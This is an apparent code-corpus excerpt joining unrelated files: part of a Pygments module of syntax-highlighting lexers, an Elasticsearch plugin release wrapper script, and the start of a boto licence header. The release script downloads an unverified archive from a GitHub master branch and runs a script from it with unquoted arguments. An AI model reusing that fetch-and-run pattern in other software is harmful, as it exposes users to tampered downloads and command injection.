                'MenuSource', 'RegexError', 'SDKCallType', 'SDKLibrary',
                'SDKFuncConfSource', 'SDKType', 'SDKPassMethod', 'RayType',
                'TraceEntityFilter', 'ListenOverride', 'SortOrder', 'SortType',
                'SortFunc2D', 'APLRes', 'FeatureType', 'FeatureStatus',
                'SMCResult', 'SMCError', 'TFClassType', 'TFTeam', 'TFCond',
                'TFResourceType', 'Timer', 'TopMenuAction', 'TopMenuObjectType',
                'TopMenuPosition', 'TopMenuObject', 'UserMsg']

    def __init__(self, **options):
        # 'sourcemod' lexer option (default True) turns on SourceMod-specific
        # highlighting of built-in types and functions.
        self.smhighlighting = get_bool_opt(options,
                                           'sourcemod', True)

        self._functions = []
        if self.smhighlighting:
            from pygments.lexers._sourcemodbuiltins import FUNCTIONS
            self._functions.extend(FUNCTIONS)
        RegexLexer.__init__(self, **options)

    def get_tokens_unprocessed(self, text):
        # Post-process plain Name tokens: re-tag known SourceMod type names
        # as Keyword.Type and known built-in functions as Name.Builtin.
        for index, token, value in \
                RegexLexer.get_tokens_unprocessed(self, text):
            if token is Name:
                if self.smhighlighting:
                    if value in self.SM_TYPES:
                        token = Keyword.Type
                    elif value in self._functions:
                        token = Name.Builtin
            yield index, token, value


class PuppetLexer(RegexLexer):
    """
    For `Puppet <http://puppetlabs.com/>`__ configuration DSL.
    *New in Pygments 1.6.*
    """
    name = 'Puppet'
    aliases = ['puppet']
    filenames = ['*.pp']

    tokens = {
        'root': [
            include('comments'),
            include('keywords'),
            include('names'),
            include('numbers'),
            include('operators'),
            include('strings'),

            (r'[]{}:(),;[]', Punctuation),
            (r'[^\S\n]+', Text),
        ],

        'comments': [
            (r'\s*#.*$', Comment),
            (r'/(\\\n)?[*](.|\n)*?[*](\\\n)?/', Comment.Multiline),
        ],

        'operators': [
            (r'(=>|\?|<|>|=|\+|-|/|\*|~|!|\|)', Operator),
            (r'(in|and|or|not)\b', Operator.Word),
        ],

        'names': [
            ('[a-zA-Z_][a-zA-Z0-9_]*', Name.Attribute),
            (r'(\$\S+)(\[)(\S+)(\])', bygroups(Name.Variable, Punctuation,
                                               String, Punctuation)),
            (r'\$\S+', Name.Variable),
        ],

        'numbers': [
            # Copypasta from the Python lexer
            (r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?j?', Number.Float),
            (r'\d+[eE][+-]?[0-9]+j?', Number.Float),
            (r'0[0-7]+j?', Number.Oct),
            (r'0[xX][a-fA-F0-9]+', Number.Hex),
            (r'\d+L', Number.Integer.Long),
            (r'\d+j?', Number.Integer)
        ],

        'keywords': [
            # Left out 'group' and 'require'
            # Since they're often used as attributes
            (r'(?i)(absent|alert|alias|audit|augeas|before|case|check|class|'
             r'computer|configured|contained|create_resources|crit|cron|debug|'
             r'default|define|defined|directory|else|elsif|emerg|err|exec|'
             r'extlookup|fail|false|file|filebucket|fqdn_rand|generate|host|if|'
             r'import|include|info|inherits|inline_template|installed|'
             r'interface|k5login|latest|link|loglevel|macauthorization|'
             r'mailalias|maillist|mcx|md5|mount|mounted|nagios_command|'
             r'nagios_contact|nagios_contactgroup|nagios_host|'
             r'nagios_hostdependency|nagios_hostescalation|nagios_hostextinfo|'
             r'nagios_hostgroup|nagios_service|nagios_servicedependency|'
             r'nagios_serviceescalation|nagios_serviceextinfo|'
             r'nagios_servicegroup|nagios_timeperiod|node|noop|notice|notify|'
             r'package|present|purged|realize|regsubst|resources|role|router|'
             r'running|schedule|scheduled_task|search|selboolean|selmodule|'
             r'service|sha1|shellquote|split|sprintf|ssh_authorized_key|sshkey|'
r'stage|stopped|subscribe|tag|tagged|template|tidy|true|undef|' r'unmounted|user|versioncmp|vlan|warning|yumrepo|zfs|zone|' r'zpool)\b', Keyword), ], 'strings': [ (r'"([^"])*"', String), (r'\'([^\'])*\'', String), ], } class NSISLexer(RegexLexer): """ For `NSIS <http://nsis.sourceforge.net/>`_ scripts. *New in Pygments 1.6.* """ name = 'NSIS' aliases = ['nsis', 'nsi', 'nsh'] filenames = ['*.nsi', '*.nsh'] mimetypes = ['text/x-nsis'] flags = re.IGNORECASE tokens = { 'root': [ (r'[;\#].*\n', Comment), (r"'.*?'", String.Single), (r'"', String.Double, 'str_double'), (r'`', String.Backtick, 'str_backtick'), include('macro'), include('interpol'), include('basic'), (r'\$\{[a-z_|][\w|]*\}', Keyword.Pseudo), (r'/[a-z_]\w*', Name.Attribute), ('.', Text), ], 'basic': [ (r'(\n)(Function)(\s+)([._a-z][.\w]*)\b', bygroups(Text, Keyword, Text, Name.Function)), (r'\b([_a-z]\w*)(::)([a-z][a-z0-9]*)\b', bygroups(Keyword.Namespace, Punctuation, Name.Function)), (r'\b([_a-z]\w*)(:)', bygroups(Name.Label, Punctuation)), (r'(\b[ULS]|\B)([\!\<\>=]?=|\<\>?|\>)\B', Operator), (r'[|+-]', Operator), (r'\\', Punctuation), (r'\b(Abort|Add(?:BrandingImage|Size)|' r'Allow(?:RootDirInstall|SkipFiles)|AutoCloseWindow|' r'BG(?:Font|Gradient)|BrandingText|BringToFront|Call(?:InstDLL)?|' r'(?:Sub)?Caption|ChangeUI|CheckBitmap|ClearErrors|CompletedText|' r'ComponentText|CopyFiles|CRCCheck|' r'Create(?:Directory|Font|Shortcut)|Delete(?:INI(?:Sec|Str)|' r'Reg(?:Key|Value))?|DetailPrint|DetailsButtonText|' r'Dir(?:Show|Text|Var|Verify)|(?:Disabled|Enabled)Bitmap|' r'EnableWindow|EnumReg(?:Key|Value)|Exch|Exec(?:Shell|Wait)?|' r'ExpandEnvStrings|File(?:BufSize|Close|ErrorText|Open|' r'Read(?:Byte)?|Seek|Write(?:Byte)?)?|' r'Find(?:Close|First|Next|Window)|FlushINI|Function(?:End)?|' r'Get(?:CurInstType|CurrentAddress|DlgItem|DLLVersion(?:Local)?|' r'ErrorLevel|FileTime(?:Local)?|FullPathName|FunctionAddress|' r'InstDirError|LabelAddress|TempFileName)|' r'Goto|HideWindow|Icon|' 
r'If(?:Abort|Errors|FileExists|RebootFlag|Silent)|' r'InitPluginsDir|Install(?:ButtonText|Colors|Dir(?:RegKey)?)|' r'Inst(?:ProgressFlags|Type(?:[GS]etText)?)|Int(?:CmpU?|Fmt|Op)|' r'IsWindow|LangString(?:UP)?|' r'License(?:BkColor|Data|ForceSelection|LangString|Text)|' r'LoadLanguageFile|LockWindow|Log(?:Set|Text)|MessageBox|' r'MiscButtonText|Name|Nop|OutFile|(?:Uninst)?Page(?:Ex(?:End)?)?|' r'PluginDir|Pop|Push|Quit|Read(?:(?:Env|INI|Reg)Str|RegDWORD)|' r'Reboot|(?:Un)?RegDLL|Rename|RequestExecutionLevel|ReserveFile|' r'Return|RMDir|SearchPath|Section(?:Divider|End|' r'(?:(?:Get|Set)(?:Flags|InstTypes|Size|Text))|Group(?:End)?|In)?|' r'SendMessage|Set(?:AutoClose|BrandingImage|Compress(?:ionLevel|' r'or(?:DictSize)?)?|CtlColors|CurInstType|DatablockOptimize|' r'DateSave|Details(?:Print|View)|Error(?:s|Level)|FileAttributes|' r'Font|OutPath|Overwrite|PluginUnload|RebootFlag|ShellVarContext|' r'Silent|StaticBkColor)|' r'Show(?:(?:I|Uni)nstDetails|Window)|Silent(?:Un)?Install|Sleep|' r'SpaceTexts|Str(?:CmpS?|Cpy|Len)|SubSection(?:End)?|' r'Uninstall(?:ButtonText|(?:Sub)?Caption|EXEName|Icon|Text)|' r'UninstPage|Var|VI(?:AddVersionKey|ProductVersion)|WindowIcon|' r'Write(?:INIStr|Reg(:?Bin|DWORD|(?:Expand)?Str)|Uninstaller)|' r'XPStyle)\b', Keyword), (r'\b(CUR|END|(?:FILE_ATTRIBUTE_)?' 
r'(?:ARCHIVE|HIDDEN|NORMAL|OFFLINE|READONLY|SYSTEM|TEMPORARY)|' r'HK(CC|CR|CU|DD|LM|PD|U)|' r'HKEY_(?:CLASSES_ROOT|CURRENT_(?:CONFIG|USER)|DYN_DATA|' r'LOCAL_MACHINE|PERFORMANCE_DATA|USERS)|' r'ID(?:ABORT|CANCEL|IGNORE|NO|OK|RETRY|YES)|' r'MB_(?:ABORTRETRYIGNORE|DEFBUTTON[1-4]|' r'ICON(?:EXCLAMATION|INFORMATION|QUESTION|STOP)|' r'OK(?:CANCEL)?|RETRYCANCEL|RIGHT|SETFOREGROUND|TOPMOST|USERICON|' r'YESNO(?:CANCEL)?)|SET|SHCTX|' r'SW_(?:HIDE|SHOW(?:MAXIMIZED|MINIMIZED|NORMAL))|' r'admin|all|auto|both|bottom|bzip2|checkbox|colored|current|false|' r'force|hide|highest|if(?:diff|newer)|lastused|leave|left|' r'listonly|lzma|nevershow|none|normal|off|on|pop|push|' r'radiobuttons|right|show|silent|silentlog|smooth|textonly|top|' r'true|try|user|zlib)\b', Name.Constant), ], 'macro': [ (r'\!(addincludedir(?:dir)?|addplugindir|appendfile|cd|define|' r'delfilefile|echo(?:message)?|else|endif|error|execute|' r'if(?:macro)?n?(?:def)?|include|insertmacro|macro(?:end)?|packhdr|' r'search(?:parse|replace)|system|tempfilesymbol|undef|verbose|' r'warning)\b', Comment.Preproc), ], 'interpol': [ (r'\$(R?[0-9])', Name.Builtin.Pseudo), # registers (r'\$(ADMINTOOLS|APPDATA|CDBURN_AREA|COOKIES|COMMONFILES(?:32|64)|' r'DESKTOP|DOCUMENTS|EXE(?:DIR|FILE|PATH)|FAVORITES|FONTS|HISTORY|' r'HWNDPARENT|INTERNET_CACHE|LOCALAPPDATA|MUSIC|NETHOOD|PICTURES|' r'PLUGINSDIR|PRINTHOOD|PROFILE|PROGRAMFILES(?:32|64)|QUICKLAUNCH|' r'RECENT|RESOURCES(?:_LOCALIZED)?|SENDTO|SM(?:PROGRAMS|STARTUP)|' r'STARTMENU|SYSDIR|TEMP(?:LATES)?|VIDEOS|WINDIR|\{NSISDIR\})', Name.Builtin), (r'\$(CMDLINE|INSTDIR|OUTDIR|LANGUAGE)', Name.Variable.Global), (r'\$[a-z_]\w*', Name.Variable), ], 'str_double': [ (r'"', String, '#pop'), (r'\$(\\[nrt"]|\$)', String.Escape), include('interpol'), (r'.', String.Double), ], 'str_backtick': [ (r'`', String, '#pop'), (r'\$(\\[nrt"]|\$)', String.Escape), include('interpol'), (r'.', String.Double), ], } class RPMSpecLexer(RegexLexer): """ For RPM *.spec files *New in Pygments 1.6.* """ name = 
'RPMSpec' aliases = ['spec'] filenames = ['*.spec'] mimetypes = ['text/x-rpm-spec'] _directives = ('(?:package|prep|build|install|clean|check|pre[a-z]*|' 'post[a-z]*|trigger[a-z]*|files)') tokens = { 'root': [ (r'#.*\n', Comment), include('basic'), ], 'description': [ (r'^(%' + _directives + ')(.*)$', bygroups(Name.Decorator, Text), '#pop'), (r'\n', Text), (r'.', Text), ], 'changelog': [ (r'\*.*\n', Generic.Subheading), (r'^(%' + _directives + ')(.*)$', bygroups(Name.Decorator, Text), '#pop'), (r'\n', Text), (r'.', Text), ], 'string': [ (r'"', String.Double, '#pop'), (r'\\([\\abfnrtv"\']|x[a-fA-F0-9]{2,4}|[0-7]{1,3})', String.Escape), include('interpol'), (r'.', String.Double), ], 'basic': [ include('macro'), (r'(?i)^(Name|Version|Release|Epoch|Summary|Group|License|Packager|' r'Vendor|Icon|URL|Distribution|Prefix|Patch[0-9]*|Source[0-9]*|' r'Requires\(?[a-z]*\)?|[a-z]+Req|Obsoletes|Suggests|Provides|Conflicts|' r'Build[a-z]+|[a-z]+Arch|Auto[a-z]+)(:)(.*)$', bygroups(Generic.Heading, Punctuation, using(this))), (r'^%description', Name.Decorator, 'description'), (r'^%changelog', Name.Decorator, 'changelog'), (r'^(%' + _directives + ')(.*)$', bygroups(Name.Decorator, Text)), (r'%(attr|defattr|dir|doc(?:dir)?|setup|config(?:ure)?|' r'make(?:install)|ghost|patch[0-9]+|find_lang|exclude|verify)', Keyword), include('interpol'), (r"'.*?'", String.Single), (r'"', String.Double, 'string'), (r'.', Text), ], 'macro': [ (r'%define.*\n', Comment.Preproc), (r'%\{\!\?.*%define.*\}', Comment.Preproc), (r'(%(?:if(?:n?arch)?|else(?:if)?|endif))(.*)$', bygroups(Comment.Preproc, Text)), ], 'interpol': [ (r'%\{?__[a-z_]+\}?', Name.Function), (r'%\{?_([a-z_]+dir|[a-z_]+path|prefix)\}?', Keyword.Pseudo), (r'%\{\?[A-Za-z0-9_]+\}', Name.Variable), (r'\$\{?RPM_[A-Z0-9_]+\}?', Name.Variable.Global), (r'%\{[a-zA-Z][a-zA-Z0-9_]+\}', Keyword.Constant), ] } class AutoItLexer(RegexLexer): """ For `AutoIt <http://www.autoitscript.com/site/autoit/>`_ files. 
AutoIt is a freeware BASIC-like scripting language designed for automating the Windows GUI and general scripting *New in Pygments 1.6.* """ name = 'AutoIt' aliases = ['autoit', 'Autoit'] filenames = ['*.au3'] mimetypes = ['text/x-autoit'] # Keywords, functions, macros from au3.keywords.properties # which can be found in AutoIt installed directory, e.g. # c:\Program Files (x86)\AutoIt3\SciTE\au3.keywords.properties keywords = """\ #include-once #include #endregion #forcedef #forceref #region and byref case continueloop dim do else elseif endfunc endif endselect exit exitloop for func global if local next not or return select step then to until wend while exit""".split() functions = """\ abs acos adlibregister adlibunregister asc ascw asin assign atan autoitsetoption autoitwingettitle autoitwinsettitle beep binary binarylen binarymid binarytostring bitand bitnot bitor bitrotate bitshift bitxor blockinput break call cdtray ceiling chr chrw clipget clipput consoleread consolewrite consolewriteerror controlclick controlcommand controldisable controlenable controlfocus controlgetfocus controlgethandle controlgetpos controlgettext controlhide controllistview controlmove controlsend controlsettext controlshow controltreeview cos dec dircopy dircreate dirgetsize dirmove dirremove dllcall dllcalladdress dllcallbackfree dllcallbackgetptr dllcallbackregister dllclose dllopen dllstructcreate dllstructgetdata dllstructgetptr dllstructgetsize dllstructsetdata drivegetdrive drivegetfilesystem drivegetlabel drivegetserial drivegettype drivemapadd drivemapdel drivemapget drivesetlabel drivespacefree drivespacetotal drivestatus envget envset envupdate eval execute exp filechangedir fileclose filecopy filecreatentfslink filecreateshortcut filedelete fileexists filefindfirstfile filefindnextfile fileflush filegetattrib filegetencoding filegetlongname filegetpos filegetshortcut filegetshortname filegetsize filegettime filegetversion fileinstall filemove fileopen fileopendialog fileread 
filereadline filerecycle filerecycleempty filesavedialog fileselectfolder filesetattrib filesetpos filesettime filewrite filewriteline floor ftpsetproxy guicreate guictrlcreateavi guictrlcreatebutton guictrlcreatecheckbox guictrlcreatecombo guictrlcreatecontextmenu guictrlcreatedate guictrlcreatedummy guictrlcreateedit guictrlcreategraphic guictrlcreategroup guictrlcreateicon guictrlcreateinput guictrlcreatelabel guictrlcreatelist guictrlcreatelistview guictrlcreatelistviewitem guictrlcreatemenu guictrlcreatemenuitem guictrlcreatemonthcal guictrlcreateobj guictrlcreatepic guictrlcreateprogress guictrlcreateradio guictrlcreateslider guictrlcreatetab guictrlcreatetabitem guictrlcreatetreeview guictrlcreatetreeviewitem guictrlcreateupdown guictrldelete guictrlgethandle guictrlgetstate guictrlread guictrlrecvmsg guictrlregisterlistviewsort guictrlsendmsg guictrlsendtodummy guictrlsetbkcolor guictrlsetcolor guictrlsetcursor guictrlsetdata guictrlsetdefbkcolor guictrlsetdefcolor guictrlsetfont guictrlsetgraphic guictrlsetimage guictrlsetlimit guictrlsetonevent guictrlsetpos guictrlsetresizing guictrlsetstate guictrlsetstyle guictrlsettip guidelete guigetcursorinfo guigetmsg guigetstyle guiregistermsg guisetaccelerators guisetbkcolor guisetcoord guisetcursor guisetfont guisethelp guiseticon guisetonevent guisetstate guisetstyle guistartgroup guiswitch hex hotkeyset httpsetproxy httpsetuseragent hwnd inetclose inetget inetgetinfo inetgetsize inetread inidelete iniread inireadsection inireadsectionnames inirenamesection iniwrite iniwritesection inputbox int isadmin isarray isbinary isbool isdeclared isdllstruct isfloat ishwnd isint iskeyword isnumber isobj isptr isstring log memgetstats mod mouseclick mouseclickdrag mousedown mousegetcursor mousegetpos mousemove mouseup mousewheel msgbox number objcreate objcreateinterface objevent objevent objget objname onautoitexitregister onautoitexitunregister opt ping pixelchecksum pixelgetcolor pixelsearch pluginclose pluginopen 
processclose processexists processgetstats processlist processsetpriority processwait processwaitclose progressoff progresson progressset ptr random regdelete regenumkey regenumval regread regwrite round run runas runaswait runwait send sendkeepactive seterror setextended shellexecute shellexecutewait shutdown sin sleep soundplay soundsetwavevolume splashimageon splashoff splashtexton sqrt srandom statusbargettext stderrread stdinwrite stdioclose stdoutread string stringaddcr stringcompare stringformat stringfromasciiarray stringinstr stringisalnum stringisalpha stringisascii stringisdigit stringisfloat stringisint stringislower stringisspace stringisupper stringisxdigit stringleft stringlen stringlower stringmid stringregexp stringregexpreplace stringreplace stringright stringsplit stringstripcr stringstripws stringtoasciiarray stringtobinary stringtrimleft stringtrimright stringupper tan tcpaccept tcpclosesocket tcpconnect tcplisten tcpnametoip tcprecv tcpsend tcpshutdown tcpstartup timerdiff timerinit tooltip traycreateitem traycreatemenu traygetmsg trayitemdelete trayitemgethandle trayitemgetstate trayitemgettext trayitemsetonevent trayitemsetstate trayitemsettext traysetclick trayseticon traysetonevent traysetpauseicon traysetstate traysettooltip traytip ubound udpbind udpclosesocket udpopen udprecv udpsend udpshutdown udpstartup vargettype winactivate winactive winclose winexists winflash wingetcaretpos wingetclasslist wingetclientsize wingethandle wingetpos wingetprocess wingetstate wingettext wingettitle winkill winlist winmenuselectitem winminimizeall winminimizeallundo winmove winsetontop winsetstate winsettitle winsettrans winwait winwaitactive winwaitclose winwaitnotactive""".split() macros = """\ @appdatacommondir @appdatadir @autoitexe @autoitpid @autoitversion @autoitx64 @com_eventobj @commonfilesdir @compiled @computername @comspec @cpuarch @cr @crlf @desktopcommondir @desktopdepth @desktopdir @desktopheight @desktoprefresh @desktopwidth 
@documentscommondir @error @exitcode @exitmethod @extended @favoritescommondir @favoritesdir @gui_ctrlhandle @gui_ctrlid @gui_dragfile @gui_dragid @gui_dropid @gui_winhandle @homedrive @homepath @homeshare @hotkeypressed @hour @ipaddress1 @ipaddress2 @ipaddress3 @ipaddress4 @kblayout @lf @logondnsdomain @logondomain @logonserver @mday @min @mon @msec @muilang @mydocumentsdir @numparams @osarch @osbuild @oslang @osservicepack @ostype @osversion @programfilesdir @programscommondir @programsdir @scriptdir @scriptfullpath @scriptlinenumber @scriptname @sec @startmenucommondir @startmenudir @startupcommondir @startupdir @sw_disable @sw_enable @sw_hide @sw_lock @sw_maximize @sw_minimize @sw_restore @sw_show @sw_showdefault @sw_showmaximized @sw_showminimized @sw_showminnoactive @sw_showna @sw_shownoactivate @sw_shownormal @sw_unlock @systemdir @tab @tempdir @tray_id @trayiconflashing @trayiconvisible @username @userprofiledir @wday @windowsdir @workingdir @yday @year""".split() tokens = { 'root': [ (r';.*\n', Comment.Single), (r'(#comments-start|#cs).*?(#comments-end|#ce)', Comment.Multiline), (r'[\[\]{}(),;]', Punctuation), (r'(and|or|not)\b', Operator.Word), (r'[\$|@][a-zA-Z_][a-zA-Z0-9_]*', Name.Variable), (r'!=|==|:=|\.=|<<|>>|[-~+/*%=<>&^|?:!.]', Operator), include('commands'), include('labels'), include('builtInFunctions'), include('builtInMarcros'), (r'"', String, combined('stringescape', 'dqs')), include('numbers'), (r'[a-zA-Z_#@$][a-zA-Z0-9_#@$]*', Name), (r'\\|\'', Text), (r'\`([\,\%\`abfnrtv\-\+;])', String.Escape), (r'_\n', Text), # Line continuation include('garbage'), ], 'commands': [ (r'(?i)(\s*)(%s)\b' % '|'.join(keywords), bygroups(Text, Name.Builtin)), ], 'builtInFunctions': [ (r'(?i)(%s)\b' % '|'.join(functions), Name.Function), ], 'builtInMarcros': [ (r'(?i)(%s)\b' % '|'.join(macros), Name.Variable.Global), ], 'labels': [ # sendkeys (r'(^\s*)({\S+?})', bygroups(Text, Name.Label)), ], 'numbers': [ (r'(\d+\.\d*|\d*\.\d+)([eE][+-]?[0-9]+)?', 
Number.Float), (r'\d+[eE][+-]?[0-9]+', Number.Float), (r'0\d+', Number.Oct), (r'0[xX][a-fA-F0-9]+', Number.Hex), (r'\d+L', Number.Integer.Long), (r'\d+', Number.Integer) ], 'stringescape': [ (r'\"\"|\`([\,\%\`abfnrtv])', String.Escape), ], 'strings': [ (r'[^"\n]+', String), ], 'dqs': [ (r'"', String, '#pop'), include('strings') ], 'garbage': [ (r'[^\S\n]', Text), ], } class RexxLexer(RegexLexer): """ `Rexx <http://www.rexxinfo.org/>`_ is a scripting language available for a wide range of different platforms with its roots found on mainframe systems. It is popular for I/O- and data based tasks and can act as glue language to bind different applications together. *New in Pygments 1.7.* """ name = 'Rexx' aliases = ['rexx', 'ARexx', 'arexx'] filenames = ['*.rexx', '*.rex', '*.rx', '*.arexx'] mimetypes = ['text/x-rexx'] flags = re.IGNORECASE tokens = { 'root': [ (r'\s', Whitespace), (r'/\*', Comment.Multiline, 'comment'), (r'"', String, 'string_double'), (r"'", String, 'string_single'), (r'[0-9]+(\.[0-9]+)?(e[+-]?[0-9])?', Number), (r'([a-z_][a-z0-9_]*)(\s*)(:)(\s*)(procedure)\b', bygroups(Name.Function, Whitespace, Operator, Whitespace, Keyword.Declaration)), (r'([a-z_][a-z0-9_]*)(\s*)(:)', bygroups(Name.Label, Whitespace, Operator)), include('function'), include('keyword'), include('operator'), (r'[a-z_][a-z0-9_]*', Text), ], 'function': [ (r'(abbrev|abs|address|arg|b2x|bitand|bitor|bitxor|c2d|c2x|' r'center|charin|charout|chars|compare|condition|copies|d2c|' r'd2x|datatype|date|delstr|delword|digits|errortext|form|' r'format|fuzz|insert|lastpos|left|length|linein|lineout|lines|' r'max|min|overlay|pos|queued|random|reverse|right|sign|' r'sourceline|space|stream|strip|substr|subword|symbol|time|' r'trace|translate|trunc|value|verify|word|wordindex|' r'wordlength|wordpos|words|x2b|x2c|x2d|xrange)(\s*)(\()', bygroups(Name.Builtin, Whitespace, Operator)), ], 'keyword': [ (r'(address|arg|by|call|do|drop|else|end|exit|for|forever|if|' 
r'interpret|iterate|leave|nop|numeric|off|on|options|parse|' r'pull|push|queue|return|say|select|signal|to|then|trace|until|' r'while)\b', Keyword.Reserved), ], 'operator': [ (r'(-|//|/|\(|\)|\*\*|\*|\\<<|\\<|\\==|\\=|\\>>|\\>|\\|\|\||\||' r'&&|&|%|\+|<<=|<<|<=|<>|<|==|=|><|>=|>>=|>>|>|¬<<|¬<|¬==|¬=|' r'¬>>|¬>|¬|\.|,)', Operator), ], 'string_double': [ (r'[^"\n]+', String), (r'""', String), (r'"', String, '#pop'), (r'\n', Text, '#pop'), # Stray linefeed also terminates strings. ], 'string_single': [ (r'[^\'\n]', String), (r'\'\'', String), (r'\'', String, '#pop'), (r'\n', Text, '#pop'), # Stray linefeed also terminates strings. ], 'comment': [ (r'[^*]+', Comment.Multiline), (r'\*/', Comment.Multiline, '#pop'), (r'\*', Comment.Multiline), ] } _c = lambda s: re.compile(s, re.MULTILINE) _ADDRESS_COMMAND_PATTERN = _c(r'^\s*address\s+command\b') _ADDRESS_PATTERN = _c(r'^\s*address\s+') _DO_WHILE_PATTERN = _c(r'^\s*do\s+while\b') _IF_THEN_DO_PATTERN = _c(r'^\s*if\b.+\bthen\s+do\s*$') _PROCEDURE_PATTERN = _c(r'^\s*([a-z_][a-z0-9_]*)(\s*)(:)(\s*)(procedure)\b') _ELSE_DO_PATTERN = _c(r'\belse\s+do\s*$') _PARSE_ARG_PATTERN = _c(r'^\s*parse\s+(upper\s+)?(arg|value)\b') PATTERNS_AND_WEIGHTS = ( (_ADDRESS_COMMAND_PATTERN, 0.2), (_ADDRESS_PATTERN, 0.05), (_DO_WHILE_PATTERN, 0.1), (_ELSE_DO_PATTERN, 0.1), (_IF_THEN_DO_PATTERN, 0.1), (_PROCEDURE_PATTERN, 0.5), (_PARSE_ARG_PATTERN, 0.2), ) def analyse_text(text): """ Check for inital comment and patterns that distinguish Rexx from other C-like languages. """ if re.search(r'/\*\**\s*rexx', text, re.IGNORECASE): # Header matches MVS Rexx requirements, this is certainly a Rexx # script. return 1.0 elif text.startswith('/*'): # Header matches general Rexx requirements; the source code might # still be any language using C comments such as C++, C# or Java. lowerText = text.lower() result = sum(weight for (pattern, weight) in RexxLexer.PATTERNS_AND_WEIGHTS if pattern.search(lowerText)) + 0.01 return min(result, 1.0)
mit
Collaborne/elasticsearch-lang-mvel
dev-tools/release.py
36
4636
# Licensed to Elasticsearch under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on
# an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.

import datetime
import os
import shutil
import sys
import time
import urllib
# NOTE(review): urllib.error was previously only reachable because
# "import urllib.request" imports it as a side effect; import it explicitly
# since we catch urllib.error.HTTPError below.
import urllib.error
import urllib.request
import zipfile

from os.path import dirname, abspath

"""
 This tool builds a release from the a given elasticsearch plugin branch.
 It is basically a wrapper on top of launch_release.py which:

 - tries to get a more recent version of launch_release.py in ...
 - download it if needed
 - launch it passing all arguments to it, like:

 $ python3 dev_tools/release.py --branch master --publish --remote origin

 Important options:

 # Dry run
 $ python3 dev_tools/release.py

 # Dry run without tests
 python3 dev_tools/release.py --skiptests

 # Release, publish artifacts and announce
 $ python3 dev_tools/release.py --publish

 See full documentation in launch_release.py
"""
env = os.environ

# Change this if the source repository for your scripts is at a different location
SOURCE_REPO = 'elasticsearch/elasticsearch-plugins-script'
# We define that we should download again the script after 1 days
SCRIPT_OBSOLETE_DAYS = 1
# We ignore in master.zip file the following files
IGNORED_FILES = ['.gitignore', 'README.md']


ROOT_DIR = abspath(os.path.join(abspath(dirname(__file__)), '../'))
TARGET_TOOLS_DIR = ROOT_DIR + '/plugin_tools'
DEV_TOOLS_DIR = ROOT_DIR + '/dev-tools'
BUILD_RELEASE_FILENAME = 'release.zip'
BUILD_RELEASE_FILE = TARGET_TOOLS_DIR + '/' + BUILD_RELEASE_FILENAME
SOURCE_URL = 'https://github.com/%s/archive/master.zip' % SOURCE_REPO

# Download a recent version of the release plugin tool
try:
    os.mkdir(TARGET_TOOLS_DIR)
    print('directory %s created' % TARGET_TOOLS_DIR)
except FileExistsError:
    pass

try:
    # we check latest update. If we ran an update recently, we
    # are not going to check it again
    download = True

    try:
        last_download_time = datetime.datetime.fromtimestamp(os.path.getmtime(BUILD_RELEASE_FILE))
        if (datetime.datetime.now() - last_download_time).days < SCRIPT_OBSOLETE_DAYS:
            download = False
    except FileNotFoundError:
        # No previous download recorded: fetch the tool for the first time.
        pass

    if download:
        urllib.request.urlretrieve(SOURCE_URL, BUILD_RELEASE_FILE)
        with zipfile.ZipFile(BUILD_RELEASE_FILE) as myzip:
            for member in myzip.infolist():
                filename = os.path.basename(member.filename)
                # skip directories
                if not filename:
                    continue
                if filename in IGNORED_FILES:
                    continue
                # copy file (taken from zipfile's extract)
                source = myzip.open(member.filename)
                target = open(os.path.join(TARGET_TOOLS_DIR, filename), "wb")
                with source, target:
                    shutil.copyfileobj(source, target)
                # We keep the original date
                date_time = time.mktime(member.date_time + (0, 0, -1))
                os.utime(os.path.join(TARGET_TOOLS_DIR, filename), (date_time, date_time))
        print('plugin-tools updated from %s' % SOURCE_URL)
except urllib.error.HTTPError:
    # Best effort: keep using the previously downloaded tools when GitHub
    # is unreachable or returns an error.
    pass

# Let see if we need to update the release.py script itself
source_time = os.path.getmtime(TARGET_TOOLS_DIR + '/release.py')
repo_time = os.path.getmtime(DEV_TOOLS_DIR + '/release.py')
if source_time > repo_time:
    input('release.py needs an update. Press a key to update it...')
    shutil.copyfile(TARGET_TOOLS_DIR + '/release.py', DEV_TOOLS_DIR + '/release.py')

# We can launch the build process
# Make sure python3 is used if python3 is available; some systems use
# python 2 as default.
# BUGFIX: os.system() never raises on command failure -- it reports it via
# the exit status. The previous try/except RuntimeError always selected
# 'python3' even on systems without it; check the return code instead.
PYTHON = 'python'
if os.system('python3 --version > /dev/null 2>&1') == 0:
    PYTHON = 'python3'

# Forward every command line argument to the real build script.
release_args = ''
for x in range(1, len(sys.argv)):
    release_args += ' ' + sys.argv[x]

os.system('%s %s/build_release.py %s' % (PYTHON, TARGET_TOOLS_DIR, release_args))
apache-2.0
wemanuel/smry
server-auth/ls/google-cloud-sdk/platform/gsutil/third_party/boto/boto/cloudsearch2/document.py
136
11630
# Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
